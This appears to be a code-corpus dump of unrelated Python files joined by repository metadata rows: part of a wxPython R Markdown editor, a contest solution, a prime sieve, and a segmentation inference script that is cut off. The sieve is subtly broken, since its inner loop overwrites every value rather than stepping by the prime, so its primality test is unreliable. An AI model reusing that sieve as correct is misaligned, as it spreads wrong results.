(ID_SYMBOL_MINUSPLUS, "minus or plus\tCtrl+Shift+-", "insert minus or plus sign", self.OnSymbol_minusplus),
(ID_SYMBOL_LESSEQL, "less than or equal\tCtrl+Shift+<", "insert less than or equal sign", self.OnSymbol_leq),
(ID_SYMBOL_GRTREQL, "greater than or equal \tCtrl+Shift+>", "insert greater than or equal sign", self.OnSymbol_geq),
(ID_SYMBOL_NOTEQL, "not equal\tCtrl+Shift+!", "insert not equal sign", self.OnSymbol_neq),
(ID_SYMBOL_LEFTPAREN, "Left Parenthesis\tCtrl+9", "insert variable size left parenthesis", self.OnSymbol_LeftParen),
(ID_SYMBOL_RIGHTPAREN, "Right Parenthesis\tCtrl+0", "insert variable size right parenthesis", self.OnSymbol_RightParen),
(ID_SYMBOL_LEFTSQUARE, "Left Square bracket\tCtrl+[", "insert variable size left square bracket", self.OnSymbol_LeftSquare),
(ID_SYMBOL_RIGHTSQUARE, "Right Square bracket\tCtrl+]", "insert variable size right square bracket", self.OnSymbol_RightSquare),
(ID_SYMBOL_LEFTCURLY, "Left Curly bracket\tCtrl+Shift+{", "insert variable size left curly bracket", self.OnSymbol_LeftCurly),
(ID_SYMBOL_RIGHTCURLY, "Right Curly bracket\tCtrl+Shift+}", "insert variable size right curly bracket", self.OnSymbol_RightCurly)]:
if id == None:
symbolsMenu.AppendSeparator()
else:
item = symbolsMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
mathsMenu.AppendMenu(-1, "Symbols", symbolsMenu)
structuresMenu = wx.Menu()
for id, label, helpText, handler in \
[
(ID_SQUAREROOT, "Square root\tAlt+Ctrl+Shift+R", "insert a square root", self.OnSquareRoot),
(ID_MATHBAR, "bar \tCtrl+Shift+B", "insert a bar operator", self.OnMathBar),
(ID_ABSVAL, "Absolute values\tCtrl+Shift+A", "insert left and right absolute value delimiters", self.OnAbsVal),
(ID_FRACTION, "Fraction\tCtrl+Shift+/", "insert a fraction", self.OnFraction),
(ID_SUMMATION, "Summation\tAlt+Ctrl+Shift+S", "insert a summation", self.OnSummation),
(ID_INTEGRAL, "Integral\tAlt+Ctrl+Shift+I", "insert an integral", self.Onintegral),
(ID_PRODUCT, "Product\tAlt+Ctrl+Shift+P", "insert a product", self.OnProduct),
(ID_LIMIT, "Limit\tAlt+Ctrl+Shift+L", "insert a limit", self.OnLimit),
(ID_DOUBLESUMMATION, "Double summation\tAlt+Ctrl+Shift+D", "insert a double summation", self.OnDoubleSummation),
(ID_DOUBLEINTEGRAL, "Double integral", "insert a double integral", self.OnDoubleIntegral)]:
if id == None:
structuresMenu.AppendSeparator()
else:
item = structuresMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
mathsMenu.AppendMenu(-1, "Structures", structuresMenu)# Add the structures Menu as a submenu to the main menu
GreekMenu = wx.Menu()
for id, label, helpText, handler in \
[
(ID_GREEK_ALPHA, "alpha\tAlt+Shift+A", "insert greek letter alpha", self.OnGreek_alpha),
(ID_GREEK_BETA, "beta\tAlt+Shift+B", "insert greek letter beta", self.OnGreek_beta),
(ID_GREEK_GAMMA, "gamma\tAlt+Shift+G", "insert greek letter gamma", self.OnGreek_gamma),
(ID_GREEK_DELTA, "delta\tAlt+Shift+D", "insert greek letter delta", self.OnGreek_delta),
(ID_GREEK_EPSILON, "epsilon\tAlt+Shift+E", "insert greek letter epsilon", self.OnGreek_epsilon),
(ID_GREEK_VAREPSILON, "epsilon (variant)\tAlt+Shift+V", "insert variant of greek letter epsilon", self.OnGreek_varepsilon),
(ID_GREEK_ZETA, "zeta\tAlt+Shift+Z", "insert greek letter zeta", self.OnGreek_zeta),
(ID_GREEK_ETA, "eta\tAlt+Shift+W", "insert greek letter eta", self.OnGreek_eta),
(ID_GREEK_THETA, "theta\tAlt+Shift+H", "insert greek letter theta", self.OnGreek_theta),
(ID_GREEK_VARTHETA, "theta (variant)\tAlt+Shift+/", "insert variant of greek letter theta", self.OnGreek_vartheta),
(ID_GREEK_IOTA, "iota\tAlt+Shift+I", "insert greek letter iota", self.OnGreek_iota),
(ID_GREEK_KAPPA, "kappa\tAlt+Shift+K", "insert greek letter kappa", self.OnGreek_kappa),
(ID_GREEK_LAMBDA, "lambda\tAlt+Shift+L", "insert greek letter lambda", self.OnGreek_lambda),
(ID_GREEK_MU, "mu\tAlt+Shift+M", "insert greek letter mu", self.OnGreek_mu),
(ID_GREEK_NU, "nu\tAlt+Shift+N", "insert greek letter nu", self.OnGreek_nu),
(ID_GREEK_XI, "xi\tAlt+Shift+X", "insert greek letter xi", self.OnGreek_xi),
(ID_GREEK_OMICRON, "omicron\tAlt+Shift+O", "insert greek letter omicron", self.OnGreek_omicron),
(ID_GREEK_PI, "pi\tAlt+Shift+P", "insert greek letter pi", self.OnGreek_pi),
(ID_GREEK_RHO, "rho\tAlt+Shift+R", "insert greek letter rho", self.OnGreek_rho),
(ID_GREEK_SIGMA, "sigma\tAlt+Shift+S", "insert greek letter sigma", self.OnGreek_sigma),
(ID_GREEK_TAU, "tau\tAlt+Shift+T", "insert greek letter tau", self.OnGreek_tau),
(ID_GREEK_UPSILON, "upsilon\tAlt+Shift+U", "insert greek letter upsilon", self.OnGreek_upsilon),
(ID_GREEK_PHI, "phi\tAlt+Shift+F", "insert greek letter phi", self.OnGreek_phi),
(ID_GREEK_CHI, "chi\tAlt+Shift+C", "insert greek letter chi", self.OnGreek_chi),
(ID_GREEK_PSI, "psi\tAlt+Shift+Y", "insert greek letter psi", self.OnGreek_psi),
(ID_GREEK_OMEGA, "omega\tAlt+Shift+.", "insert greek letter omega", self.OnGreek_omega)]:
if id == None:
GreekMenu.AppendSeparator()
else:
item = GreekMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
mathsMenu.AppendMenu(-1, "Greek letters", GreekMenu)
menuBar.Append(mathsMenu, "Maths") # Add the maths Menu to the MenuBar
statsMenu = wx.Menu()
for id, label, helpText, handler in \
[
(ID_RCOMMAND, "Insert inline R command", "insert an in-line R command", self.OnRCommand),
(ID_RCHUNK, "Insert R code chunk\tAlt+R", "insert standard R code chunk", self.OnRChunk),
(ID_RGRAPH, "Insert R code chunk for a graph\tAlt+G", "insert R code chunk for a graph", self.OnRGraph),
(ID_RLASSIGN, "Insert a left assignment\tCtrl+<", "insert R code for the left assignment <-", self.OnRLAssign),
(ID_RRASSIGN, "Insert a right assignment\tCtrl+>", "insert R code for the right assignment ->", self.OnRRAssign),
(ID_RPIPE, "Insert a pipe operator\tCtrl+Shift+P", "insert R code for the pipe operator %>%", self.OnRPipe)]:
if id == None:
statsMenu.AppendSeparator()
else:
item = statsMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
menuBar.Append(statsMenu, "Stats") # Add the stats Menu to the MenuBar
helpMenu = wx.Menu()
for id, label, helpText, handler in \
[(wx.ID_ABOUT, "About", "Information about this program", self.OnAbout)]:
if id == None:
fileMenu.AppendSeparator()
else:
item = helpMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
menuBar.Append(helpMenu, "&Help") # Add the helpMenu to the MenuBar
self.SetMenuBar(menuBar) # Add the menuBar to the Frame
def CreateShellCtrl(self):
shell = Shell(self, -1, wx.Point(0, 0), wx.Size(150, 90),
wx.NO_BORDER | wx.TE_MULTILINE, InterpClass=MyInterpretor)
shell.SetFont(self.font)
return shell
def CreateTextCtrl(self, text):
text = wx.TextCtrl(self, -1, text, wx.Point(0, 0), wx.Size(150, 90),
wx.NO_BORDER | wx.TE_MULTILINE)
text.SetFont(self.font)
return text
def SetTitle(self, *args, **kwargs):
# MainWindow.SetTitle overrides wx.Frame.SetTitle, so we have to
# call it using super:
super(MainWindow, self).SetTitle("WriteR - %s" % self.filename)
# Helper methods:
def defaultFileDialogOptions(self):
return dict(message="Choose a file", defaultDir=self.dirname, wildcard="*.*")
def askUserForFilename(self, **dialogOptions):
dialog = wx.FileDialog(self, **dialogOptions)
if dialog.ShowModal() == wx.ID_OK:
userProvidedFilename = True
self.filename = dialog.GetFilename()
self.dirname = dialog.GetDirectory()
self.SetTitle() # Update the window title with the new filename
else:
userProvidedFilename = False
dialog.Destroy()
return userProvidedFilename
# Event handlers:
# file menu events
def OnOpen(self, event):
if self.askUserForFilename(style=wx.OPEN, **self.defaultFileDialogOptions()):
self.fileOpen(self.dirname, self.filename)
def fileOpen(self, dirname, filename):
textfile = open(join(dirname, filename), "r")
self.editor.SetValue(textfile.read())
textfile.close()
def OnNewFile(self, event):
self.olddirname = self.dirname
self.dirname = ".\\templates"
self.OnOpen(event)
self.dirname = self.olddirname
if self.filename == "Blank.Rmd":
self.editor.WriteText("% file created on " + asctime() + "\n\n")
self.OnSaveAs(event)
def OnSaveAs(self, event):
if self.askUserForFilename(defaultFile=self.filename, style=wx.SAVE, **self.defaultFileDialogOptions()):
self.OnSave(event)
def OnSave(self, event):
textfile = open(join(self.dirname, self.filename), "w")
textfile.write(self.editor.GetValue())
textfile.close()
def OnExit(self, event):
self.Close() # Close the main window.
def OnSafeExit(self, event):
self.OnSave(event)
self.OnExit(event)
# help menu events
OnAbout = HelpMenuEvents.OnAbout
# edit menu events
OnSelectAll = EditMenuEvents.OnSelectAll
OnDelete = EditMenuEvents.OnDelete
OnPaste = EditMenuEvents.OnPaste
OnCopy = EditMenuEvents.OnCopy
OnCut = EditMenuEvents.OnCut
OnGoToLine = EditMenuEvents.OnGoToLine
OnWordCount = EditMenuEvents.OnWordCount
# view menu events
def StatusBar(self):
self.statusbar = self.CreateStatusBar()
self.statusbar.SetFieldsCount(3)
self.statusbar.SetStatusWidths([-5, -2, -1])
self.SetStatusText(SBText)
def OnIncreaseFontSize(self, event):
self.font.SetPointSize(self.font.GetPointSize()+1)
self.UpdateUI()
def OnDecreaseFontSize(self, event):
self.font.SetPointSize(self.font.GetPointSize()-1)
self.UpdateUI()
def UpdateUI(self):
self.editor.SetFont(self.font)
#self.editor.SetForegroundColour(self.curClr)
#self.ps.SetLabel(str(self.font.GetPointSize()))
#self.family.SetLabel(self.font.GetFamilyString())
#self.style.SetLabel(self.font.GetStyleString())
#self.weight.SetLabel(self.font.GetWeightString())
#self.face.SetLabel(self.font.GetFaceName())
#self.nfi.SetLabel(self.font.GetNativeFontInfo().ToString())
self.Layout()
def OnSelectFont(self, evt):
data = wx.FontData()
data.EnableEffects(False)
#data.SetColour(self.curClr) # set colour
data.SetInitialFont(self.font)
dlg = wx.FontDialog(self, data)
if dlg.ShowModal() == wx.ID_OK:
data = dlg.GetFontData()
font = data.GetChosenFont()
#colour = data.GetColour()
self.font = font
#self.curClr = colour
self.UpdateUI()
# Don't destroy the dialog until you get everything you need from the
# dialog!
dlg.Destroy()
# general events
def StartThread(self, input_object):
if self.sub_flag.isSet(): return
if self.comp_thread is not None:
self.sub_flag.set()
while self.comp_thread.isAlive():
sleep(1)
self.sub_flag.clear()
self.console.SetValue('')
self.comp_thread = BashProcessThread(self.sub_flag, input_object, self.console.WriteText)
self.comp_thread.start()
# Build Menu events
OnRenderNull = RMarkdownEvents.OnRenderNull
OnBuild = OnRenderNull # sets default build
OnRenderHtml = RMarkdownEvents.OnRenderHtml
OnRenderSlidy = RMarkdownEvents.OnRenderSlidy
OnRenderAll = RMarkdownEvents.OnRenderAll
OnRenderWord = RMarkdownEvents.OnRenderWord
OnRenderPdf = RMarkdownEvents.OnRenderPdf
OnSelectRenderNull = RMarkdownEvents.OnSelectRenderNull
OnSelectRenderHtml = RMarkdownEvents.OnSelectRenderHtml
OnSelectRenderSlidy = RMarkdownEvents.OnSelectRenderSlidy
OnSelectRenderAll = RMarkdownEvents.OnSelectRenderAll
OnSelectRenderWord = RMarkdownEvents.OnSelectRenderWord
OnSelectRenderPdf = RMarkdownEvents.OnSelectRenderPdf
OnKnit2html = RMarkdownEvents.OnKnit2html
OnKnit2pdf = RMarkdownEvents.OnKnit2pdf
# R and RMarkdown events
OnRCommand = RMarkdownEvents.OnRCommand
OnRChunk = RMarkdownEvents.OnRChunk
OnRGraph = RMarkdownEvents.OnRGraph
OnRPipe = RMarkdownEvents.OnRPipe
OnRLAssign = RMarkdownEvents.OnRLAssign
OnRRAssign = RMarkdownEvents.OnRRAssign
# MathInserts are all LaTeX input for math mode
OnSymbol_infinity = MathInserts.OnSymbol_infinity
OnSymbol_plusminus = MathInserts.OnSymbol_plusminus
OnSymbol_minusplus = MathInserts.OnSymbol_minusplus
OnSymbol_geq = MathInserts.OnSymbol_geq
OnSymbol_leq = MathInserts.OnSymbol_leq
OnSymbol_neq = MathInserts.OnSymbol_neq
OnSymbol_times = MathInserts.OnSymbol_times
OnSymbol_partial = MathInserts.OnSymbol_partial
OnSymbol_LeftParen = MathInserts.OnSymbol_LeftParen
OnSymbol_RightParen = MathInserts.OnSymbol_RightParen
OnSymbol_LeftSquare = MathInserts.OnSymbol_LeftSquare
OnSymbol_RightSquare = MathInserts.OnSymbol_RightSquare
OnSymbol_LeftCurly = MathInserts.OnSymbol_LeftCurly
OnSymbol_RightCurly = MathInserts.OnSymbol_RightCurly
OnAbsVal = MathInserts.OnAbsVal
OnMathBar = MathInserts.OnMathBar
OnSquareRoot = MathInserts.OnSquareRoot
OnFraction = MathInserts.OnFraction
OnSummation = MathInserts.OnSummation
Onintegral = MathInserts.Onintegral
OnProduct = MathInserts.OnProduct
OnLimit = MathInserts.OnLimit
OnDoubleSummation = MathInserts.OnDoubleSummation
OnDoubleIntegral = MathInserts.OnDoubleIntegral
OnGreek_alpha = MathInserts.OnGreek_alpha
OnGreek_beta = MathInserts.OnGreek_beta
OnGreek_gamma = MathInserts.OnGreek_gamma
OnGreek_delta = MathInserts.OnGreek_delta
OnGreek_epsilon = MathInserts.OnGreek_epsilon
OnGreek_varepsilon = MathInserts.OnGreek_varepsilon
OnGreek_zeta = MathInserts.OnGreek_zeta
OnGreek_eta = MathInserts.OnGreek_eta
OnGreek_theta = MathInserts.OnGreek_theta
OnGreek_vartheta = MathInserts.OnGreek_vartheta
OnGreek_iota = MathInserts.OnGreek_iota
OnGreek_kappa = MathInserts.OnGreek_kappa
OnGreek_lambda = MathInserts.OnGreek_lambda
OnGreek_mu = MathInserts.OnGreek_mu
OnGreek_nu = MathInserts.OnGreek_nu
OnGreek_xi = MathInserts.OnGreek_xi
OnGreek_omicron = MathInserts.OnGreek_omicron
OnGreek_pi = MathInserts.OnGreek_pi
OnGreek_rho = MathInserts.OnGreek_rho
OnGreek_sigma = MathInserts.OnGreek_sigma
OnGreek_tau = MathInserts.OnGreek_tau
OnGreek_upsilon = MathInserts.OnGreek_upsilon
OnGreek_phi = MathInserts.OnGreek_phi
OnGreek_chi = MathInserts.OnGreek_chi
OnGreek_psi = MathInserts.OnGreek_psi
OnGreek_omega = MathInserts.OnGreek_omega
OnMathRoundBrack = MathInserts.OnMathRoundBrack
OnMathCurlyBrack = MathInserts.OnMathCurlyBrack
OnMathSquareBrack = MathInserts.OnMathSquareBrack
# format menu events
def OnSquareBrack(self, event):
frm, to = self.editor.GetSelection()
self.editor.SetInsertionPoint(to)
self.editor.WriteText("]")
self.editor.SetInsertionPoint(frm)
self.editor.WriteText("[")
self.editor.SetInsertionPoint(to + 2)
def OnCurlyBrack(self, event):
frm, to = self.editor.GetSelection()
self.editor.SetInsertionPoint(to)
self.editor.WriteText("}")
self.editor.SetInsertionPoint(frm)
self.editor.WriteText("{")
self.editor.SetInsertionPoint(to + 2)
def OnRoundBrack(self, event):
frm, to = self.editor.GetSelection()
self.editor.SetInsertionPoint(to)
self.editor.WriteText(")")
self.editor.SetInsertionPoint(frm)
self.editor.WriteText("(")
self.editor.SetInsertionPoint(to + 2)
def OnMath(self, event):
frm, to = self.editor.GetSelection()
self.editor.SetInsertionPoint(to)
self.editor.WriteText("$")
self.editor.SetInsertionPoint(frm)
self.editor.WriteText("$")
self.editor.SetInsertionPoint(to + 2)
def OnItalic(self, event):
frm, to = self.editor.GetSelection()
self.editor.SetInsertionPoint(to)
self.editor.WriteText("*")
self.editor.SetInsertionPoint(frm)
self.editor.WriteText("*")
self.editor.SetInsertionPoint(to + 2)
def OnBold(self, event):
frm, to = self.editor.GetSelection()
self.editor.SetInsertionPoint(to)
self.editor.WriteText("**")
self.editor.SetInsertionPoint(frm)
self.editor.WriteText("**")
self.editor.SetInsertionPoint(to + 4)
def OnCode(self, event):
frm, to = self.editor.GetSelection()
self.editor.SetInsertionPoint(to)
self.editor.WriteText("`")
self.editor.SetInsertionPoint(frm)
self.editor.WriteText("`")
self.editor.SetInsertionPoint(to + 2)
def OnAddHeadBlock(self, event):
self.editor.SetInsertionPoint(0)
self.editor.WriteText('---\ntitle: ""\nauthor: ""\ndate: ""\noutput: html_document\n---\n')
self.editor.SetInsertionPoint(13)
def OnAddReference(self, event):
self.editor.WriteText(" [@ref] ")
def OnAddURL(self, event):
self.editor.WriteText(" [alt text](http://) ")
def OnAddEMail(self, event):
self.editor.WriteText(" [name](Mailto:) ")
def OnAddFigure(self, event):
self.editor.WriteText("  ")
def OnHeading1(self, event):
self.editor.WriteText("\n# ")
def OnHeading2(self, event):
self.editor.WriteText("\n## ")
def OnHeading3(self, event):
self.editor.WriteText("\n### ")
def OnHeading4(self, event):
self.editor.WriteText("\n#### ")
def OnHeading5(self, event):
self.editor.WriteText("\n##### ")
def OnHeading6(self, event):
self.editor.WriteText("\n###### ")
# view menu events
def ToggleStatusBar(self, event):
if self.statusbar.IsShown():
self.statusbar.Hide()
else:
self.statusbar.Show()
self.SetStatusText(SBText)
def OnClose(self, event):
self.settings['filename'] = self.filename
self.settings['lastdir'] = self.dirname
self.setSettings(self.settingsFile, self.settings)
if event.CanVeto() and self.editor.IsModified():
hold = wx.MessageBox("Would you like to save your work?",
"Save before exit?",
wx.ICON_QUESTION | wx.YES_NO | wx.CANCEL | wx.YES_DEFAULT)
if hold == wx.YES:
self.OnSave(event)
self.Destroy()
elif hold == wx.NO:
self.Destroy()
else:
event.Veto()
else:
self.Destroy()
def GetRDirectory(self):
def splitter(path, interest):
look = split(path)
if interest in look[1]:
return look[1]
if len(look[0]) == 0:
return None
return splitter(look[0], interest)
rscript = 'Rscript.exe'
warn = "Cannot find {} in default install location.".format(rscript)
version = "R-0.0.0"
choice = None
if "No settings file reference to settings":
if isdir("C:\\Program Files\\R"):
hold = "C:\\Program Files\\R"
elif isdir("C:\\Program Files (x86)\\R"):
hold = "C:\\Program Files (x86)\\R"
else:
print warn; return
options = [join(r, rscript) for r, d, f in walk(hold) if rscript in f]
printing('options', options)
if len(options) > 0:
choice = options[0]
for op in options[1:]:
vv = splitter(op, 'R-')
if vv >= version:
if 'x64' in op:
choice = op
version = vv
elif 'i386' in op and 'x64' not in choice:
choice = op
version = vv
elif 'i386' not in choice and 'x64' not in choice:
choice = op
version = vv
else:
print warn; return
else:
'something to get the information out of the settings file.'
return choice
def GetStartPosition(self):
self.x = self.x + 20
x = self.x
pt = self.ClientToScreen(wx.Point(0, 0))
return wx.Point(pt.x + x, pt.y + x)
def getSettings(self, filepath, settings):
try:
file = open(filepath, 'r')
sets = file.read()
file.close()
if len(sets) > 0:
sets = dcf_loads(sets)
assert (set(settings.keys()) == set(sets.keys()))
return sets
except:
pass
return self.setSettings(filepath, settings)
def setSettings(self, filepath, settings):
file = open(filepath, 'w')
file.write(dcf_dumps(settings))
file.close()
return settings
def OnSettings(self, event):
wx.MessageBox("You wanted to see the settings")
def OnShowFindToFix(self, event):
wx.MessageBox("This feature is not fully implemented as yet.")
def OnShowFindReplaceToFix(self, event):
wx.MessageBox("This feature is not fully implemented as yet.")
def OnShowFind(self, event):
data = wx.FindReplaceData()
dlg = wx.FindReplaceDialog(self, data, "Find")
dlg.data = data # save a reference to it...
dlg.Show(True)
def OnShowFindReplace(self, event):
data = wx.FindReplaceData()
dlg = wx.FindReplaceDialog(self, data, "Find & Replace", wx.FR_REPLACEDIALOG)
dlg.data = data # save a reference to it...
dlg.Show(True)
def OnFind(self, event):
map = {
wx.wxEVT_COMMAND_FIND : "FIND",
wx.wxEVT_COMMAND_FIND_NEXT : "FIND_NEXT",
wx.wxEVT_COMMAND_FIND_REPLACE : "REPLACE",
wx.wxEVT_COMMAND_FIND_REPLACE_ALL : "REPLACE_ALL",
}
et = event.GetEventType()
if et in map:
evtType = map[et]
else:
evtType = "**Unknown Event Type**"
if et in [wx.wxEVT_COMMAND_FIND_REPLACE, wx.wxEVT_COMMAND_FIND_REPLACE_ALL]:
replaceTxt = "Replace text: %s" % event.GetReplaceString()
else:
replaceTxt = ""
def OnFindClose(self, event):
event.GetDialog().Destroy()
# mandatory lines to get program running.
if __name__ == "__main__":
app = wx.App()
frame = MainWindow()
frame.Show()
app.MainLoop()
| [
"a.j.godfrey@massey.ac.nz"
] | a.j.godfrey@massey.ac.nz |
a4e44762a7511ec359dd8e19c070b721d03e6d4c | ce6fc44470dcb5fca78cdd3349a7be70d75f2e3a | /AtCoder/Panasonic 2020/C.py | df4a723d90f0c2af78b234c8e09df7cc7078f4ca | [] | no_license | cormackikkert/competitive-programming | f3fa287fcb74248ba218ecd763f8f6df31d57424 | 3a1200b8ff9b6941c422371961a127d7be8f2e00 | refs/heads/master | 2022-12-17T02:02:40.892608 | 2020-09-20T11:47:15 | 2020-09-20T11:47:15 | 266,775,265 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 137 | py | a, b, c = map(int, input().split())
if (c - a - b) >= 0 and 4 * a * b < (c - a - b) * (c - a - b):
print("Yes")
else:
print("No") | [
"u6427001@anu.edu.au"
] | u6427001@anu.edu.au |
308f47876d956e476994e9c9fe6924bde8b25f3c | 22e9d7c194cf22513d68b61b97c49405a47e8708 | /Number_Theory/sieves_primality_test.py | ef64fdf8d48dbf9a21543d0f6f5e2a11e959499b | [] | no_license | SandeepPadhi/Algorithmic_Database | 44c26f9300a99539781c5beb5587997b3ecadfe1 | ab8040a7dad94c84ec88f40e44b8520edcbe2443 | refs/heads/main | 2023-06-22T02:04:29.362315 | 2021-07-19T17:48:40 | 2021-07-19T17:48:40 | 338,329,340 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | import math
maxn=1000000
spf=[i for i in range(maxn+1)]
def sieve(spf):
for i in range(2,int(math.sqrt(maxn))+1,1):
if spf[i]==i:
for j in range(i*i,maxn+1):
spf[j]=i
def isPrime(x):
return True if spf[x]==x else False
sieve(spf)
print(isPrime(31)) | [
"padhisandeep96@gmail.com"
] | padhisandeep96@gmail.com |
3aca6340545fed7cbce0819167db2bb2462c2766 | 87d7eb0d93980ebdf655758ea608bd2f3fb9b126 | /detect.py | aeeadcc7ce600d0baf5adbb82cdb2bb26e8a8925 | [] | no_license | cheeeaaaters/FYP-flask | 73e1d4ba51d5c3dbdb59f21ace28e1ea6d35010e | 68d91a8de35cc77275d146e24b1c36296d5a68fb | refs/heads/master | 2021-04-10T05:20:44.910502 | 2020-04-14T08:32:37 | 2020-04-14T08:32:37 | 248,913,168 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,469 | py | import argparse
import scipy
import os
import numpy as np
import json
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import transforms
from scipy import ndimage
from tqdm import tqdm
from math import ceil
from glob import glob
from PIL import Image
import dataloaders
import models
from utils.helpers import colorize_mask
from utils import palette
import time
import cv2
def pad_image(img, target_size):
rows_to_pad = max(target_size[0] - img.shape[2], 0)
cols_to_pad = max(target_size[1] - img.shape[3], 0)
padded_img = F.pad(img, (0, cols_to_pad, 0, rows_to_pad), "constant", 0)
return padded_img
def sliding_predict(model, image, num_classes, flip=True):
image_size = image.shape
tile_size = (int(image_size[2]//2.5), int(image_size[3]//2.5))
overlap = 1/3
stride = ceil(tile_size[0] * (1 - overlap))
num_rows = int(ceil((image_size[2] - tile_size[0]) / stride) + 1)
num_cols = int(ceil((image_size[3] - tile_size[1]) / stride) + 1)
total_predictions = np.zeros((num_classes, image_size[2], image_size[3]))
count_predictions = np.zeros((image_size[2], image_size[3]))
tile_counter = 0
for row in range(num_rows):
for col in range(num_cols):
x_min, y_min = int(col * stride), int(row * stride)
x_max = min(x_min + tile_size[1], image_size[3])
y_max = min(y_min + tile_size[0], image_size[2])
img = image[:, :, y_min:y_max, x_min:x_max]
padded_img = pad_image(img, tile_size)
tile_counter += 1
padded_prediction = model(padded_img)
if flip:
fliped_img = padded_img.flip(-1)
fliped_predictions = model(padded_img.flip(-1))
padded_prediction = 0.5 * (fliped_predictions.flip(-1) + padded_prediction)
predictions = padded_prediction[:, :, :img.shape[2], :img.shape[3]]
count_predictions[y_min:y_max, x_min:x_max] += 1
total_predictions[:, y_min:y_max, x_min:x_max] += predictions.data.cpu().numpy().squeeze(0)
total_predictions /= count_predictions
return total_predictions
def multi_scale_predict(model, image, scales, num_classes, device, flip=False):
input_size = (image.size(2), image.size(3))
upsample = nn.Upsample(size=input_size, mode='bilinear', align_corners=True)
total_predictions = np.zeros((num_classes, image.size(2), image.size(3)))
image = image.data.data.cpu().numpy()
for scale in scales:
scaled_img = ndimage.zoom(image, (1.0, 1.0, float(scale), float(scale)), order=1, prefilter=False)
scaled_img = torch.from_numpy(scaled_img).to(device)
scaled_prediction = upsample(model(scaled_img).cpu())
if flip:
fliped_img = scaled_img.flip(-1).to(device)
fliped_predictions = upsample(model(fliped_img).cpu())
scaled_prediction = 0.5 * (fliped_predictions.flip(-1) + scaled_prediction)
total_predictions += scaled_prediction.data.cpu().numpy().squeeze(0)
total_predictions /= len(scales)
return total_predictions
def save_images(image, mask, output_path, image_file, palette, original_size, output=None):
# Saves the image, the model output and the results after the post processing
zero_pad = 256 * 3 - len(palette)
for i in range(zero_pad):
palette.append(0)
w, h = image.size
if original_size:
w, h =original_size
if output:
print(mask.shape)
resize_mask = cv2.resize(mask, dsize=original_size, interpolation=cv2.INTER_NEAREST)
print(resize_mask.shape)
pc_0 = int(np.count_nonzero(resize_mask==0))
pc_1 = int(np.count_nonzero(resize_mask==1))
pc_2 = int(np.count_nonzero(resize_mask==2))
pc_3 = int(np.count_nonzero(resize_mask==3))
pc_total = pc_0 + pc_1 + pc_2 + pc_3
output["pc_0"] = pc_0
output["pc_1"] = pc_1
output["pc_2"] = pc_2
output["pc_3"] = pc_3
output["pc_total"] = pc_total
image_file = os.path.basename(image_file).split('.')[0]
colorized_mask = colorize_mask(mask, palette)
if image.size != original_size:
image = image.resize(size=original_size, resample=Image.BILINEAR)
if colorized_mask.size != original_size:
colorized_mask = colorized_mask.resize(size=original_size, resample=Image.NEAREST)
blend = Image.blend(image, colorized_mask.convert('RGB'), 0.5)
mask_path = os.path.join(output_path, image_file+'.png')
colorized_mask.save(mask_path)
output_im = Image.new('RGB', (w*3, h))
output_im.paste(image, (0,0))
output_im.paste(colorized_mask, (w*1,0))
output_im.paste(blend, (w*2,0))
blend_path = os.path.join(output_path, image_file+'_colorized.png')
output_im.save(blend_path)
if output:
output['mask'] = mask_path
output['blend'] = blend_path
# mask_img = Image.fromarray(mask, 'L')
# mask_img.save(os.path.join(output_path, image_file+'.png'))
def main():
args = parse_arguments()
print(args)
config = json.load(open(args.config))
# Dataset used for training the model
dataset_type = config['train_loader']['type']
loader = getattr(dataloaders, config['train_loader']['type'])(**config['train_loader']['args'])
to_tensor = transforms.ToTensor()
#normalize = transforms.Normalize(loader.MEAN, loader.STD)
num_classes = loader.dataset.num_classes
palette = loader.dataset.palette
base_size = loader.dataset.base_size
# Model
model = getattr(models, config['arch']['type'])(num_classes, **config['arch']['args'])
availble_gpus = list(range(torch.cuda.device_count()))
device = torch.device('cuda:0' if len(availble_gpus) > 0 else 'cpu')
checkpoint = torch.load(args.model)
if isinstance(checkpoint, dict) and 'state_dict' in checkpoint.keys():
checkpoint = checkpoint['state_dict']
if 'module' in list(checkpoint.keys())[0] and not isinstance(model, torch.nn.DataParallel):
model = torch.nn.DataParallel(model)
model.load_state_dict(checkpoint)
model.to(device)
model.eval()
#test
if args.half:
model=model.half()
if not os.path.exists('outputs'):
os.makedirs('outputs')
image_files = sorted(glob(os.path.join(args.images, f'*.{args.extension}')))
with torch.no_grad():
tbar = tqdm(image_files, ncols=100)
Total_Inference_Time=0
for img_file in tbar:
image = Image.open(img_file).convert('RGB')
original_size=image.size
if base_size:
image = image.resize(size=(base_size, base_size), resample=Image.BILINEAR)
#input = normalize(to_tensor(image)).unsqueeze(0)
input = to_tensor(image).unsqueeze(0)
if args.half:
input = input.half()
ticks = time.time()
if args.mode == 'multiscale':
prediction = multi_scale_predict(model, input, scales, num_classes, device)
elif args.mode == 'sliding':
prediction = sliding_predict(model, input, num_classes)
else:
prediction = model(input.to(device))
Total_Inference_Time += time.time()-ticks
if config['arch']['type'][:2] == 'IC':
prediction = prediction[0]
elif config['arch']['type'][-3:] == 'OCR':
prediction = prediction[0]
elif config['arch']['type'][:3] == 'Enc':
prediction = prediction[0]
elif config['arch']['type'][:5] == 'DANet':
prediction = prediction[0]
if args.half:
prediction = prediction.squeeze(0).float().cpu().numpy()
else:
prediction = prediction.squeeze(0).cpu().numpy()
prediction = F.softmax(torch.from_numpy(prediction), dim=0).argmax(0).cpu().numpy()
save_images(image, prediction, args.output, img_file, palette, original_size)
print("time used: {}".format(Total_Inference_Time))
def process(trays, backref=False):
root = os.path.dirname(__file__)
train_loader_type = "TM2"
train_loader_args = {
"data_dir": "/home/ubuntu/TM2",
"batch_size": 8,
"base_size": 512,
"crop_size": False,
"augment": True,
"shuffle": True,
"scale": False,
"flip": False,
"rotate": False,
"blur": False,
"split": "train",
"num_workers": 8
}
arch_type = "HRNetV2_OCR"
arch_args = {
"backbone": "resnet18",
"freeze_bn": False,
"freeze_backbone": False
}
args = {
"mode": "normal",
"model": "/home/ubuntu/FYP-Seg/weights/checkpoint-epoch250.pth",
